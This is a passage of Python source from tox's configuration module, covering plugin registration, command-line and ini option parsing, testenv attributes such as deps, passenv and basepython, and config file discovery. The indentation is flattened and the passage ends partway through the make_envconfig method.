def get_plugin_manager(plugins=()):
# initialize plugin manager
import tox.venv
pm = pluggy.PluginManager("tox")
pm.add_hookspecs(tox.hookspecs)
pm.register(tox.config)
pm.register(tox.interpreters)
pm.register(tox.venv)
pm.register(tox.session)
from tox import package
pm.register(package)
pm.load_setuptools_entrypoints("tox")
for plugin in plugins:
pm.register(plugin)
pm.check_pending()
return pm
class Parser:
"""Command line and ini-parser control object."""
def __init__(self):
class HelpFormatter(argparse.ArgumentDefaultsHelpFormatter):
def __init__(self, prog):
super(HelpFormatter, self).__init__(prog, max_help_position=35, width=190)
self.argparser = argparse.ArgumentParser(
description="tox options", add_help=False, prog="tox", formatter_class=HelpFormatter
)
self._testenv_attr = []
def add_argument(self, *args, **kwargs):
""" add argument to command line parser. This takes the
same arguments that ``argparse.ArgumentParser.add_argument``.
"""
return self.argparser.add_argument(*args, **kwargs)
def add_testenv_attribute(self, name, type, help, default=None, postprocess=None):
""" add an ini-file variable for "testenv" section.
Types are specified as strings like "bool", "line-list", "string", "argv", "path",
"argvlist".
The ``postprocess`` function will be called for each testenv
like ``postprocess(testenv_config=testenv_config, value=value)``
where ``value`` is the value as read from the ini (or the default value)
and ``testenv_config`` is a :py:class:`tox.config.TestenvConfig` instance
which will receive all ini-variables as object attributes.
Any postprocess function must return a value which will then be set
as the final value in the testenv section.
"""
self._testenv_attr.append(VenvAttribute(name, type, default, help, postprocess))
def add_testenv_attribute_obj(self, obj):
""" add an ini-file variable as an object.
        This works like the ``add_testenv_attribute`` function but expects
"name", "type", "help", and "postprocess" attributes on the object.
"""
assert hasattr(obj, "name")
assert hasattr(obj, "type")
assert hasattr(obj, "help")
assert hasattr(obj, "postprocess")
self._testenv_attr.append(obj)
def parse_cli(self, args, strict=False):
args, argv = self.argparser.parse_known_args(args)
if argv and (strict or WITHIN_PROVISION):
self.argparser.error("unrecognized arguments: {}".format(" ".join(argv)))
return args
def _format_help(self):
return self.argparser.format_help()
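# A minimal sketch (hypothetical, not part of tox) of the add_testenv_attribute
# API documented above, as a plugin's tox_addoption hook would use it; the
# attribute name "example_flag" is made up purely for illustration.
def _example_add_testenv_attribute(parser):
    def _postprocess(testenv_config, value):
        # called per testenv with the ini value (or the default); whatever is
        # returned becomes the final value on the testenv section
        return bool(value)
    parser.add_testenv_attribute(
        name="example_flag",
        type="bool",
        default=False,
        postprocess=_postprocess,
        help="hypothetical flag used only to illustrate the API above",
    )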
class VenvAttribute:
def __init__(self, name, type, default, help, postprocess):
self.name = name
self.type = type
self.default = default
self.help = help
self.postprocess = postprocess
class DepOption:
name = "deps"
type = "line-list"
help = "each line specifies a dependency in pip/setuptools format."
default = ()
def postprocess(self, testenv_config, value):
deps = []
config = testenv_config.config
for depline in value:
m = re.match(r":(\w+):\s*(\S+)", depline)
if m:
iname, name = m.groups()
ixserver = config.indexserver[iname]
else:
name = depline.strip()
ixserver = None
# we need to process options, in case they contain a space,
# as the subprocess call to pip install will otherwise fail.
# in case of a short option, we remove the space
for option in tox.PIP.INSTALL_SHORT_OPTIONS_ARGUMENT:
if name.startswith(option):
name = "{}{}".format(option, name[len(option) :].strip())
# in case of a long option, we add an equal sign
for option in tox.PIP.INSTALL_LONG_OPTIONS_ARGUMENT:
name_start = "{} ".format(option)
if name.startswith(name_start):
name = "{}={}".format(option, name[len(option) :].strip())
name = self._cut_off_dep_comment(name)
name = self._replace_forced_dep(name, config)
deps.append(DepConfig(name, ixserver))
return deps
def _replace_forced_dep(self, name, config):
"""Override given dependency config name. Take ``--force-dep-version`` option into account.
:param name: dep config, for example ["pkg==1.0", "other==2.0"].
:param config: ``Config`` instance
:return: the new dependency that should be used for virtual environments
"""
if not config.option.force_dep:
return name
for forced_dep in config.option.force_dep:
if self._is_same_dep(forced_dep, name):
return forced_dep
return name
@staticmethod
def _cut_off_dep_comment(name):
return re.sub(r"\s+#.*", "", name).strip()
@classmethod
def _is_same_dep(cls, dep1, dep2):
"""Definitions are the same if they refer to the same package, even if versions differ."""
dep1_name = canonicalize_name(requirements.Requirement(dep1).name)
try:
dep2_name = canonicalize_name(requirements.Requirement(dep2).name)
except requirements.InvalidRequirement:
# we couldn't parse a version, probably a URL
return False
return dep1_name == dep2_name
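# Illustration (not in the original source) of DepOption._is_same_dep above:
# two requirement strings count as the same dependency when their canonical
# package names match, regardless of the version specifiers.
def _example_is_same_dep():
    assert DepOption._is_same_dep("pytest<2.7", "pytest==5.0")
    assert not DepOption._is_same_dep("pytest<2.7", "django>=1.6")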
class PosargsOption:
name = "args_are_paths"
type = "bool"
default = True
help = "treat positional args in commands as paths"
def postprocess(self, testenv_config, value):
config = testenv_config.config
args = config.option.args
if args:
if value:
args = []
for arg in config.option.args:
if arg and not os.path.isabs(arg):
origpath = os.path.join(config.invocationcwd.strpath, arg)
if os.path.exists(origpath):
arg = os.path.relpath(origpath, testenv_config.changedir.strpath)
args.append(arg)
testenv_config._reader.addsubstitutions(args)
return value
class InstallcmdOption:
name = "install_command"
type = "argv"
default = "python -m pip install {opts} {packages}"
help = "install command for dependencies and package under test."
def postprocess(self, testenv_config, value):
if "{packages}" not in value:
raise tox.exception.ConfigError(
"'install_command' must contain '{packages}' substitution"
)
return value
def parseconfig(args, plugins=()):
"""Parse the configuration file and create a Config object.
:param plugins:
:param list[str] args: list of arguments.
:rtype: :class:`Config`
:raise SystemExit: toxinit file is not found
"""
pm = get_plugin_manager(plugins)
config, option = parse_cli(args, pm)
update_default_reporter(config.option.quiet_level, config.option.verbose_level)
for config_file in propose_configs(option.configfile):
config_type = config_file.basename
content = None
if config_type == "pyproject.toml":
toml_content = get_py_project_toml(config_file)
try:
content = toml_content["tool"]["tox"]["legacy_tox_ini"]
except KeyError:
continue
ParseIni(config, config_file, content)
pm.hook.tox_configure(config=config) # post process config object
break
else:
if option.help or option.helpini:
return config
msg = "tox config file (either {}) not found"
candidates = ", ".join(INFO.CONFIG_CANDIDATES)
feedback(msg.format(candidates), sysexit=not (option.help or option.helpini))
return config
def get_py_project_toml(path):
with open(str(path)) as file_handler:
config_data = toml.load(file_handler)
return config_data
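# Illustration (not part of the module) of the pyproject.toml layout that
# parseconfig() above accepts: the ini text is read from the
# tool.tox.legacy_tox_ini key and then parsed like a regular tox.ini; the
# envlist below is only an example.
_EXAMPLE_PYPROJECT_TOML = """
[tool.tox]
legacy_tox_ini = '''
[tox]
envlist = py38
'''
"""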
def propose_configs(cli_config_file):
from_folder = py.path.local()
if cli_config_file is not None:
if os.path.isfile(cli_config_file):
yield py.path.local(cli_config_file)
return
if os.path.isdir(cli_config_file):
from_folder = py.path.local(cli_config_file)
else:
print(
"ERROR: {} is neither file or directory".format(cli_config_file), file=sys.stderr
)
return
for basename in INFO.CONFIG_CANDIDATES:
if from_folder.join(basename).isfile():
yield from_folder.join(basename)
for path in from_folder.parts(reverse=True):
ini_path = path.join(basename)
if ini_path.check():
yield ini_path
def parse_cli(args, pm):
parser = Parser()
pm.hook.tox_addoption(parser=parser)
option = parser.parse_cli(args)
if option.version:
print(get_version_info(pm))
raise SystemExit(0)
interpreters = Interpreters(hook=pm.hook)
config = Config(
pluginmanager=pm, option=option, interpreters=interpreters, parser=parser, args=args
)
return config, option
def feedback(msg, sysexit=False):
print("ERROR: {}".format(msg), file=sys.stderr)
if sysexit:
raise SystemExit(1)
def get_version_info(pm):
out = ["{} imported from {}".format(tox.__version__, tox.__file__)]
plugin_dist_info = pm.list_plugin_distinfo()
if plugin_dist_info:
out.append("registered plugins:")
for mod, egg_info in plugin_dist_info:
source = getattr(mod, "__file__", repr(mod))
out.append(" {}-{} at {}".format(egg_info.project_name, egg_info.version, source))
return "\n".join(out)
class SetenvDict(object):
_DUMMY = object()
def __init__(self, definitions, reader):
self.definitions = definitions
self.reader = reader
self.resolved = {}
self._lookupstack = []
def __repr__(self):
return "{}: {}".format(self.__class__.__name__, self.definitions)
def __contains__(self, name):
return name in self.definitions
def get(self, name, default=None):
try:
return self.resolved[name]
except KeyError:
try:
if name in self._lookupstack:
raise KeyError(name)
val = self.definitions[name]
except KeyError:
return os.environ.get(name, default)
self._lookupstack.append(name)
try:
self.resolved[name] = res = self.reader._replace(val)
finally:
self._lookupstack.pop()
return res
def __getitem__(self, name):
x = self.get(name, self._DUMMY)
if x is self._DUMMY:
raise KeyError(name)
return x
def keys(self):
return self.definitions.keys()
def __setitem__(self, name, value):
self.definitions[name] = value
self.resolved[name] = value
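# A small sketch (with a hypothetical reader object, not from tox) of how
# SetenvDict above resolves values: each definition is passed through the
# reader's _replace() once and cached in .resolved, while unknown names fall
# back to os.environ.
def _example_setenv_dict():
    class _IdentityReader:
        def _replace(self, value):
            return value
    env = SetenvDict({"FOO": "bar"}, _IdentityReader())
    assert env["FOO"] == "bar"
    assert env.get("MISSING", "default") == os.environ.get("MISSING", "default")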
@tox.hookimpl
def tox_addoption(parser):
parser.add_argument(
"--version", action="store_true", help="report version information to stdout."
)
parser.add_argument("-h", "--help", action="store_true", help="show help about options")
parser.add_argument(
"--help-ini", "--hi", action="store_true", dest="helpini", help="show help about ini-names"
)
add_verbosity_commands(parser)
parser.add_argument(
"--showconfig",
action="store_true",
help="show live configuration (by default all env, with -l only default targets,"
" specific via TOXENV/-e)",
)
parser.add_argument(
"-l",
"--listenvs",
action="store_true",
help="show list of test environments (with description if verbose)",
)
parser.add_argument(
"-a",
"--listenvs-all",
action="store_true",
help="show list of all defined environments (with description if verbose)",
)
parser.add_argument(
"-c", dest="configfile", help="config file name or directory with 'tox.ini' file."
)
parser.add_argument(
"-e",
action="append",
dest="env",
metavar="envlist",
help="work against specified environments (ALL selects all).",
)
parser.add_argument(
"--devenv",
metavar="ENVDIR",
help=(
"sets up a development environment at ENVDIR based on the env's tox "
"configuration specified by `-e` (-e defaults to py)."
),
)
parser.add_argument("--notest", action="store_true", help="skip invoking test commands.")
parser.add_argument(
"--sdistonly", action="store_true", help="only perform the sdist packaging activity."
)
add_parallel_flags(parser)
parser.add_argument(
"--parallel--safe-build",
action="store_true",
dest="parallel_safe_build",
help="(deprecated) ensure two tox builds can run in parallel "
"(uses a lock file in the tox workdir with .lock extension)",
)
parser.add_argument(
"--installpkg",
metavar="PATH",
help="use specified package for installation into venv, instead of creating an sdist.",
)
parser.add_argument(
"--develop",
action="store_true",
help="install package in the venv using 'setup.py develop' via 'pip -e .'",
)
parser.add_argument(
"-i",
"--index-url",
action="append",
dest="indexurl",
metavar="URL",
help="set indexserver url (if URL is of form name=url set the "
"url for the 'name' indexserver, specifically)",
)
parser.add_argument(
"--pre",
action="store_true",
help="install pre-releases and development versions of dependencies. "
"This will pass the --pre option to install_command "
"(pip by default).",
)
parser.add_argument(
"-r", "--recreate", action="store_true", help="force recreation of virtual environments"
)
parser.add_argument(
"--result-json",
dest="resultjson",
metavar="PATH",
help="write a json file with detailed information "
"about all commands and results involved.",
)
parser.add_argument(
"--discover",
dest="discover",
nargs="+",
metavar="PATH",
help="for python discovery first try the python executables under these paths",
default=[],
)
# We choose 1 to 4294967295 because it is the range of PYTHONHASHSEED.
parser.add_argument(
"--hashseed",
metavar="SEED",
help="set PYTHONHASHSEED to SEED before running commands. "
"Defaults to a random integer in the range [1, 4294967295] "
"([1, 1024] on Windows). "
"Passing 'noset' suppresses this behavior.",
)
parser.add_argument(
"--force-dep",
action="append",
metavar="REQ",
help="Forces a certain version of one of the dependencies "
"when configuring the virtual environment. REQ Examples "
"'pytest<2.7' or 'django>=1.6'.",
)
parser.add_argument(
"--sitepackages",
action="store_true",
help="override sitepackages setting to True in all envs",
)
parser.add_argument(
"--alwayscopy", action="store_true", help="override alwayscopy setting to True in all envs"
)
cli_skip_missing_interpreter(parser)
parser.add_argument("--workdir", metavar="PATH", help="tox working directory")
parser.add_argument(
"args", nargs="*", help="additional arguments available to command positional substitution"
)
def _set_envdir_from_devenv(testenv_config, value):
if testenv_config.config.option.devenv is not None:
return py.path.local(testenv_config.config.option.devenv)
else:
return value
parser.add_testenv_attribute(
name="envdir",
type="path",
default="{toxworkdir}/{envname}",
help="set venv directory -- be very careful when changing this as tox "
"will remove this directory when recreating an environment",
postprocess=_set_envdir_from_devenv,
)
# add various core venv interpreter attributes
def setenv(testenv_config, value):
setenv = value
config = testenv_config.config
if "PYTHONHASHSEED" not in setenv and config.hashseed is not None:
setenv["PYTHONHASHSEED"] = config.hashseed
setenv["TOX_ENV_NAME"] = str(testenv_config.envname)
setenv["TOX_ENV_DIR"] = str(testenv_config.envdir)
return setenv
parser.add_testenv_attribute(
name="setenv",
type="dict_setenv",
postprocess=setenv,
help="list of X=Y lines with environment variable settings",
)
def basepython_default(testenv_config, value):
"""either user set or proposed from the factor name
in both cases we check that the factor name implied python version and the resolved
python interpreter version match up; if they don't we warn, unless ignore base
python conflict is set in which case the factor name implied version if forced
"""
for factor in testenv_config.factors:
match = tox.PYTHON.PY_FACTORS_RE.match(factor)
if match:
base_exe = {"py": "python"}.get(match.group(1), match.group(1))
version_s = match.group(2)
if not version_s:
version_info = ()
elif len(version_s) == 1:
version_info = (version_s,)
else:
version_info = (version_s[0], version_s[1:])
implied_version = ".".join(version_info)
implied_python = "{}{}".format(base_exe, implied_version)
break
else:
implied_python, version_info, implied_version = None, (), ""
if testenv_config.config.ignore_basepython_conflict and implied_python is not None:
return implied_python
proposed_python = (implied_python or sys.executable) if value is None else str(value)
if implied_python is not None and implied_python != proposed_python:
testenv_config.basepython = proposed_python
python_info_for_proposed = testenv_config.python_info
if not isinstance(python_info_for_proposed, NoInterpreterInfo):
proposed_version = ".".join(
str(x) for x in python_info_for_proposed.version_info[: len(version_info)]
)
if proposed_version != implied_version:
# TODO(stephenfin): Raise an exception here in tox 4.0
warnings.warn(
"conflicting basepython version (set {}, should be {}) for env '{}';"
"resolve conflict or set ignore_basepython_conflict".format(
proposed_version, implied_version, testenv_config.envname
)
)
return proposed_python
parser.add_testenv_attribute(
name="basepython",
type="basepython",
default=None,
postprocess=basepython_default,
help="executable name or path of interpreter used to create a virtual test environment.",
)
def merge_description(testenv_config, value):
"""the reader by default joins generated description with new line,
replace new line with space"""
return value.replace("\n", " ")
parser.add_testenv_attribute(
name="description",
type="string",
default="",
postprocess=merge_description,
help="short description of this environment",
)
parser.add_testenv_attribute(
name="envtmpdir", type="path", default="{envdir}/tmp", help="venv temporary directory"
)
parser.add_testenv_attribute(
name="envlogdir", type="path", default="{envdir}/log", help="venv log directory"
)
parser.add_testenv_attribute(
name="downloadcache",
type="string",
default=None,
help="(ignored) has no effect anymore, pip-8 uses local caching by default",
)
parser.add_testenv_attribute(
name="changedir",
type="path",
default="{toxinidir}",
help="directory to change to when running commands",
)
parser.add_testenv_attribute_obj(PosargsOption())
parser.add_testenv_attribute(
name="skip_install",
type="bool",
default=False,
help="Do not install the current package. This can be used when you need the virtualenv "
"management but do not want to install the current package",
)
parser.add_testenv_attribute(
name="ignore_errors",
type="bool",
default=False,
help="if set to True all commands will be executed irrespective of their result error "
"status.",
)
def recreate(testenv_config, value):
if testenv_config.config.option.recreate:
return True
return value
parser.add_testenv_attribute(
name="recreate",
type="bool",
default=False,
postprocess=recreate,
help="always recreate this test environment.",
)
def passenv(testenv_config, value):
# Flatten the list to deal with space-separated values.
value = list(itertools.chain.from_iterable([x.split(" ") for x in value]))
passenv = {
"CURL_CA_BUNDLE",
"LANG",
"LANGUAGE",
"LD_LIBRARY_PATH",
"PATH",
"PIP_INDEX_URL",
"REQUESTS_CA_BUNDLE",
"SSL_CERT_FILE",
"TOX_WORK_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"NO_PROXY",
str(REPORTER_TIMESTAMP_ON_ENV),
str(PARALLEL_ENV_VAR_KEY_PUBLIC),
}
# read in global passenv settings
p = os.environ.get("TOX_TESTENV_PASSENV", None)
if p is not None:
env_values = [x for x in p.split() if x]
value.extend(env_values)
# we ensure that tmp directory settings are passed on
# we could also set it to the per-venv "envtmpdir"
# but this leads to very long paths when run with jenkins
# so we just pass it on by default for now.
if tox.INFO.IS_WIN:
passenv.add("SYSTEMDRIVE") # needed for pip6
passenv.add("SYSTEMROOT") # needed for python's crypto module
passenv.add("PATHEXT") # needed for discovering executables
passenv.add("COMSPEC") # needed for distutils cygwincompiler
passenv.add("TEMP")
passenv.add("TMP")
# for `multiprocessing.cpu_count()` on Windows (prior to Python 3.4).
passenv.add("NUMBER_OF_PROCESSORS")
passenv.add("PROCESSOR_ARCHITECTURE") # platform.machine()
passenv.add("USERPROFILE") # needed for `os.path.expanduser()`
passenv.add("MSYSTEM") # fixes #429
else:
passenv.add("TMPDIR")
for spec in value:
for name in os.environ:
if fnmatchcase(name.upper(), spec.upper()):
passenv.add(name)
return passenv
parser.add_testenv_attribute(
name="passenv",
type="line-list",
postprocess=passenv,
help="environment variables needed during executing test commands (taken from invocation "
"environment). Note that tox always passes through some basic environment variables "
"which are needed for basic functioning of the Python system. See --showconfig for the "
"eventual passenv setting.",
)
parser.add_testenv_attribute(
name="whitelist_externals",
type="line-list",
help="each lines specifies a path or basename for which tox will not warn "
"about it coming from outside the test environment.",
)
parser.add_testenv_attribute(
name="platform",
type="string",
default=".*",
help="regular expression which must match against ``sys.platform``. "
"otherwise testenv will be skipped.",
)
def sitepackages(testenv_config, value):
return testenv_config.config.option.sitepackages or value
def alwayscopy(testenv_config, value):
return testenv_config.config.option.alwayscopy or value
parser.add_testenv_attribute(
name="sitepackages",
type="bool",
default=False,
postprocess=sitepackages,
help="Set to ``True`` if you want to create virtual environments that also "
"have access to globally installed packages.",
)
parser.add_testenv_attribute(
"download",
type="bool",
default=False,
help="download the latest pip, setuptools and wheel when creating the virtual"
"environment (default is to use the one bundled in virtualenv)",
)
parser.add_testenv_attribute(
name="alwayscopy",
type="bool",
default=False,
postprocess=alwayscopy,
help="Set to ``True`` if you want virtualenv to always copy files rather "
"than symlinking.",
)
def pip_pre(testenv_config, value):
return testenv_config.config.option.pre or value
parser.add_testenv_attribute(
name="pip_pre",
type="bool",
default=False,
postprocess=pip_pre,
help="If ``True``, adds ``--pre`` to the ``opts`` passed to the install command. ",
)
def develop(testenv_config, value):
option = testenv_config.config.option
return not option.installpkg and (value or option.develop or option.devenv is not None)
parser.add_testenv_attribute(
name="usedevelop",
type="bool",
postprocess=develop,
default=False,
help="install package in develop/editable mode",
)
parser.add_testenv_attribute_obj(InstallcmdOption())
parser.add_testenv_attribute(
name="list_dependencies_command",
type="argv",
default="python -m pip freeze",
help="list dependencies for a virtual environment",
)
parser.add_testenv_attribute_obj(DepOption())
parser.add_testenv_attribute(
name="interrupt_timeout",
type="float",
default=INTERRUPT_TIMEOUT,
help="timeout before sending SIGTERM after SIGINT",
)
parser.add_testenv_attribute(
name="terminate_timeout",
type="float",
default=TERMINATE_TIMEOUT,
help="timeout before sending SIGKILL after SIGTERM",
)
parser.add_testenv_attribute(
name="commands",
type="argvlist",
default="",
help="each line specifies a test command and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_pre",
type="argvlist",
default="",
help="each line specifies a setup command action and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_post",
type="argvlist",
default="",
help="each line specifies a teardown command and can use substitution.",
)
parser.add_testenv_attribute(
"ignore_outcome",
type="bool",
default=False,
help="if set to True a failing result of this testenv will not make "
"tox fail, only a warning will be produced",
)
parser.add_testenv_attribute(
"extras",
type="line-list",
help="list of extras to install with the source distribution or develop install",
)
add_parallel_config(parser)
def cli_skip_missing_interpreter(parser):
class SkipMissingInterpreterAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
value = "true" if values is None else values
if value not in ("config", "true", "false"):
raise argparse.ArgumentTypeError("value must be config, true or false")
setattr(namespace, self.dest, value)
parser.add_argument(
"-s",
"--skip-missing-interpreters",
default="config",
metavar="val",
nargs="?",
action=SkipMissingInterpreterAction,
help="don't fail tests for missing interpreters: {config,true,false} choice",
)
class Config(object):
"""Global Tox config object."""
def __init__(self, pluginmanager, option, interpreters, parser, args):
self.envconfigs = OrderedDict()
"""Mapping envname -> envconfig"""
self.invocationcwd = py.path.local()
self.interpreters = interpreters
self.pluginmanager = pluginmanager
self.option = option
self._parser = parser
self._testenv_attr = parser._testenv_attr
self.args = args
"""option namespace containing all parsed command line options"""
@property
def homedir(self):
homedir = get_homedir()
if homedir is None:
homedir = self.toxinidir # FIXME XXX good idea?
return homedir
class TestenvConfig:
"""Testenv Configuration object.
In addition to some core attributes/properties this config object holds all
per-testenv ini attributes as attributes, see "tox --help-ini" for an overview.
"""
def __init__(self, envname, config, factors, reader):
#: test environment name
self.envname = envname
#: global tox config object
self.config = config
#: set of factors
self.factors = factors
self._reader = reader
self._missing_subs = []
"""Holds substitutions that could not be resolved.
Pre 2.8.1 missing substitutions crashed with a ConfigError although this would not be a
problem if the env is not part of the current testrun. So we need to remember this and
check later when the testenv is actually run and crash only then.
"""
def get_envbindir(self):
"""Path to directory where scripts/binaries reside."""
if tox.INFO.IS_WIN and "jython" not in self.basepython and "pypy" not in self.basepython:
return self.envdir.join("Scripts")
else:
return self.envdir.join("bin")
@property
def envbindir(self):
return self.get_envbindir()
@property
def envpython(self):
"""Path to python executable."""
return self.get_envpython()
def get_envpython(self):
""" path to python/jython executable. """
if "jython" in str(self.basepython):
name = "jython"
else:
name = "python"
return self.envbindir.join(name)
def get_envsitepackagesdir(self):
"""Return sitepackagesdir of the virtualenv environment.
NOTE: Only available during execution, not during parsing.
"""
x = self.config.interpreters.get_sitepackagesdir(info=self.python_info, envdir=self.envdir)
return x
@property
def python_info(self):
"""Return sitepackagesdir of the virtualenv environment."""
return self.config.interpreters.get_info(envconfig=self)
def getsupportedinterpreter(self):
if tox.INFO.IS_WIN and self.basepython and "jython" in self.basepython:
raise tox.exception.UnsupportedInterpreter(
"Jython/Windows does not support installing scripts"
)
info = self.config.interpreters.get_info(envconfig=self)
if not info.executable:
raise tox.exception.InterpreterNotFound(self.basepython)
if not info.version_info:
raise tox.exception.InvocationError(
"Failed to get version_info for {}: {}".format(info.name, info.err)
)
return info.executable
testenvprefix = "testenv:"
def get_homedir():
try:
return py.path.local._gethomedir()
except Exception:
return None
def make_hashseed():
max_seed = 4294967295
if tox.INFO.IS_WIN:
max_seed = 1024
return str(random.randint(1, max_seed))
class ParseIni(object):
def __init__(self, config, ini_path, ini_data): # noqa
config.toxinipath = ini_path
using("tox.ini: {} (pid {})".format(config.toxinipath, os.getpid()))
config.toxinidir = config.toxinipath.dirpath()
self._cfg = py.iniconfig.IniConfig(config.toxinipath, ini_data)
previous_line_of = self._cfg.lineof
def line_of_default_to_zero(section, name=None):
at = previous_line_of(section, name=name)
if at is None:
at = 0
return at
self._cfg.lineof = line_of_default_to_zero
config._cfg = self._cfg
self.config = config
prefix = "tox" if ini_path.basename == "setup.cfg" else None
fallbacksection = "tox:tox" if ini_path.basename == "setup.cfg" else "tox"
context_name = getcontextname()
if context_name == "jenkins":
reader = SectionReader(
"tox:jenkins", self._cfg, prefix=prefix, fallbacksections=[fallbacksection]
)
dist_share_default = "{toxworkdir}/distshare"
elif not context_name:
reader = SectionReader("tox", self._cfg, prefix=prefix)
dist_share_default = "{homedir}/.tox/distshare"
else:
raise ValueError("invalid context")
if config.option.hashseed is None:
hash_seed = make_hashseed()
elif config.option.hashseed == "noset":
hash_seed = None
else:
hash_seed = config.option.hashseed
config.hashseed = hash_seed
reader.addsubstitutions(toxinidir=config.toxinidir, homedir=config.homedir)
if config.option.workdir is None:
config.toxworkdir = reader.getpath("toxworkdir", "{toxinidir}/.tox")
else:
config.toxworkdir = config.toxinidir.join(config.option.workdir, abs=True)
if os.path.exists(str(config.toxworkdir)):
config.toxworkdir = config.toxworkdir.realpath()
reader.addsubstitutions(toxworkdir=config.toxworkdir)
config.ignore_basepython_conflict = reader.getbool("ignore_basepython_conflict", False)
config.distdir = reader.getpath("distdir", "{toxworkdir}/dist")
reader.addsubstitutions(distdir=config.distdir)
config.distshare = reader.getpath("distshare", dist_share_default)
config.temp_dir = reader.getpath("temp_dir", "{toxworkdir}/.tmp")
reader.addsubstitutions(distshare=config.distshare)
config.sdistsrc = reader.getpath("sdistsrc", None)
config.setupdir = reader.getpath("setupdir", "{toxinidir}")
config.logdir = config.toxworkdir.join("log")
within_parallel = PARALLEL_ENV_VAR_KEY_PRIVATE in os.environ
if not within_parallel and not WITHIN_PROVISION:
ensure_empty_dir(config.logdir)
# determine indexserver dictionary
config.indexserver = {"default": IndexServerConfig("default")}
prefix = "indexserver"
for line in reader.getlist(prefix):
name, url = map(lambda x: x.strip(), line.split("=", 1))
config.indexserver[name] = IndexServerConfig(name, url)
if config.option.skip_missing_interpreters == "config":
val = reader.getbool("skip_missing_interpreters", False)
config.option.skip_missing_interpreters = "true" if val else "false"
override = False
if config.option.indexurl:
for url_def in config.option.indexurl:
m = re.match(r"\W*(\w+)=(\S+)", url_def)
if m is None:
url = url_def
name = "default"
else:
name, url = m.groups()
if not url:
url = None
if name != "ALL":
config.indexserver[name].url = url
else:
override = url
# let ALL override all existing entries
if override:
for name in config.indexserver:
config.indexserver[name] = IndexServerConfig(name, override)
self.handle_provision(config, reader)
self.parse_build_isolation(config, reader)
res = self._getenvdata(reader, config)
config.envlist, all_envs, config.envlist_default, config.envlist_explicit = res
# factors used in config or predefined
known_factors = self._list_section_factors("testenv")
known_factors.update({"py", "python"})
# factors stated in config envlist
stated_envlist = reader.getstring("envlist", replace=False)
if stated_envlist:
for env in _split_env(stated_envlist):
known_factors.update(env.split("-"))
# configure testenvs
to_do = []
failures = OrderedDict()
results = {}
cur_self = self
def run(name, section, subs, config):
try:
results[name] = cur_self.make_envconfig(name, section, subs, config)
except Exception as exception:
failures[name] = (exception, traceback.format_exc())
order = []
for name in all_envs:
section = "{}{}".format(testenvprefix, name)
factors = set(name.split("-"))
if (
section in self._cfg
or factors <= known_factors
or all(
tox.PYTHON.PY_FACTORS_RE.match(factor) for factor in factors - known_factors
)
):
order.append(name)
thread = Thread(target=run, args=(name, section, reader._subs, config))
thread.daemon = True
thread.start()
to_do.append(thread)
for thread in to_do:
while thread.is_alive():
thread.join(timeout=20)
if failures:
raise tox.exception.ConfigError(
"\n".join(
"{} failed with {} at {}".format(key, exc, trace)
for key, (exc, trace) in failures.items()
)
)
for name in order:
config.envconfigs[name] = results[name]
all_develop = all(
name in config.envconfigs and config.envconfigs[name].usedevelop
for name in config.envlist
)
config.skipsdist = reader.getbool("skipsdist", all_develop)
if config.option.devenv is not None:
config.option.notest = True
if config.option.devenv is not None and len(config.envlist) != 1:
feedback("--devenv requires only a single -e", sysexit=True)
def handle_provision(self, config, reader):
requires_list = reader.getlist("requires")
config.minversion = reader.getstring("minversion", None)
config.provision_tox_env = name = reader.getstring("provision_tox_env", ".tox")
min_version = "tox >= {}".format(config.minversion or tox.__version__)
deps = self.ensure_requires_satisfied(config, requires_list, min_version)
if config.run_provision:
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["description"] = "meta tox"
env_config = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config
)
env_config.deps = deps
config.envconfigs[config.provision_tox_env] = env_config
raise tox.exception.MissingRequirement(config)
# if provisioning is not on, now we need do a strict argument evaluation
# raise on unknown args
self.config._parser.parse_cli(args=self.config.args, strict=True)
@staticmethod
def ensure_requires_satisfied(config, requires, min_version):
missing_requirements = []
failed_to_parse = False
deps = []
exists = set()
for require in requires + [min_version]:
# noinspection PyBroadException
try:
package = requirements.Requirement(require)
# check if the package even applies
if package.marker and not package.marker.evaluate({"extra": ""}):
continue
package_name = canonicalize_name(package.name)
if package_name not in exists:
deps.append(DepConfig(require, None))
exists.add(package_name)
dist = importlib_metadata.distribution(package.name)
if not package.specifier.contains(dist.version, prereleases=True):
raise MissingDependency(package)
except requirements.InvalidRequirement as exception:
failed_to_parse = True
error("failed to parse {!r}".format(exception))
except Exception as exception:
verbosity1("could not satisfy requires {!r}".format(exception))
missing_requirements.append(str(requirements.Requirement(require)))
if failed_to_parse:
raise tox.exception.BadRequirement()
if WITHIN_PROVISION and missing_requirements:
msg = "break infinite loop provisioning within {} missing {}"
raise tox.exception.Error(msg.format(sys.executable, missing_requirements))
config.run_provision = bool(len(missing_requirements))
return deps
def parse_build_isolation(self, config, reader):
config.isolated_build = reader.getbool("isolated_build", False)
config.isolated_build_env = reader.getstring("isolated_build_env", ".package")
if config.isolated_build is True:
name = config.isolated_build_env
section_name = "testenv:{}".format(name)
if section_name not in self._cfg.sections:
self._cfg.sections[section_name] = {}
self._cfg.sections[section_name]["deps"] = ""
self._cfg.sections[section_name]["sitepackages"] = "False"
self._cfg.sections[section_name]["description"] = "isolated packaging environment"
config.envconfigs[name] = self.make_envconfig(
name, "{}{}".format(testenvprefix, name), reader._subs, config
)
def _list_section_factors(self, section):
factors = set()
if section in self._cfg:
for _, value in self._cfg[section].items():
exprs = re.findall(r"^([\w{}\.!,-]+)\:\s+", value, re.M)
factors.update(*mapcat(_split_factor_expr_all, exprs))
return factors
def make_envconfig(self, name, section, subs, config, replace=True):
factors = set(name.split("-"))
reader = SectionReader(section, self._cfg, fallbacksections=["testenv"], factors=factors)
tc = TestenvConfig(name, config, factors, reader)
reader.addsubstitutions(
envname=name,
envbindir=tc.get_envbindir,
envsitepackagesdir=tc.get_envsitepackagesdir,
envpython=tc.get_envpython,
**subs
)
for env_attr in config._testenv_attr:
atype = env_attr.type
try:
if atype in (
"bool",
"float",
"path",
"string",
"dict",
"dict_setenv",
"argv",
"argvlist",
):
meth = getattr(reader, "get{}".format(atype))
res = meth(env_attr.name, env_attr.default, replace=replace)
elif atype == "basepython":
no_fallback = name in (config.provision_tox_env,)
res = reader.getstring(
env_attr.name, env_attr.default, replace=replace, no_fallback=no_fallback
)
